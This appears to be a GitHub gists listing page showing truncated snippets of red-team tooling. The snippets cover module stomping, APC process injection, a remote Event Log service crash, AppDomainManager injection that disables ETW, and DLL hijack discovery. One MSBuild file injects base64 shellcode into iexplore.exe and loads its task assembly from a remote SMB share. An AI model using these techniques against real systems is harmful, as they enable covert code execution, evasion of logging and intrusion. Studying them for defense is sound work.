@slyd0g
slyd0g / ModuleStomp.cs
Created November 17, 2020 17:49
Barely functional module stomping in C#
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
namespace ModuleStomp
{
class Program
{
static string ModuleName = @"xpsservices.dll";
slyd0g / DInjectQueuerAPC.cs
Created November 16, 2020 16:49 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
slyd0g / eventvwr_crash.py
Created September 21, 2020 15:41 — forked from byt3bl33d3r/eventvwr_crash.py
Crash the Windows Event Log service remotely (needs admin privs)
# Crash the Windows Event Log Service remotely, needs Admin privs
# originally discovered by limbenjamin and accidentally re-discovered by @byt3bl33d3r
#
# Once the service crashes 3 times it will not restart for 24 hours
#
# https://github.com/limbenjamin/LogServiceCrash
# https://limbenjamin.com/articles/crash-windows-event-logging-service.html
#
# Needs the impacket library (https://github.com/SecureAuthCorp/impacket)
slyd0g / README.md
Created September 1, 2020 15:59 — forked from byt3bl33d3r/README.md
Remote AppDomainManager Injection

This is a variation of the technique originally discovered by subtee and described here

TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly> element pointing to a specially crafted .NET assembly which executes when the application is loaded.

This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)

  1. Copy some binary you love to, say, C:\Test. Let's use aspnet_compiler.exe as an example
  2. Compile test.cs to test.dll with a signed strong name; this is required to load an assembly outside of a .NET application's base directory.
  3. Host test.dll on a remote SMB or HTTP(S) server
#!/usr/bin/env python3
'''Converts videos to formats acceptable to iMovie.'''
import argparse
import os
from pathlib import Path
import cv2
import moviepy.editor as mp
slyd0g / rpc_dump_august.txt
Created August 6, 2020 17:43 — forked from enigma0x3/rpc_dump_august.txt
RPC interfaces dump August 2018
--------------------------------------------------------------------------------
<WinProcess "smss.exe" pid 520 at 0x5db0c50L>
64
[!!] Invalid rpcrt4 base: 0x0 vs 0x7ff868230000
--------------------------------------------------------------------------------
<WinProcess "csrss.exe" pid 776 at 0x5db0908L>
64
Interfaces :
Endpoints :
slyd0g / clr_via_native.c
Created July 1, 2020 16:18 — forked from xpn/clr_via_native.c
A quick example showing loading CLR via native code
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
#Get-PotentialDLLHijack -CSVPath .\Logfile.CSV -MaliciousDLLPath .\DLLHijackTest.dll -ProcessPath "C:\Users\John\AppData\Local\Programs\Microsoft VS Code\Code.exe"
function Get-PotentialDLLHijack {
param (
[String]
$CSVPath = "",
[String]
$MaliciousDLLPath = "",
[String]
$ProcessPath = "",
[String]
https://stackoverflow.com/questions/32787502/put-bytes-from-unsigned-char-array-to-stdstring-using-memcpy-function
unsigned char* firstMessage = new unsigned char[firstMessageSize](); //this will initialize on the heap, clean 0'd out
# string to unsigned char *, .c_str() to convert to signed char * then cast
std::string firstMessage = payloadUUID + stringIV + ciphertext + mac;
unsigned char* ucharFirstMessage = (unsigned char*)firstMessage.c_str();
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MyTarget">
<SimpleTask MyProperty="My voice is my passport."
MyCode='<base64 encoded x64 shellcode>'
MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
</Target>
<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
</Project>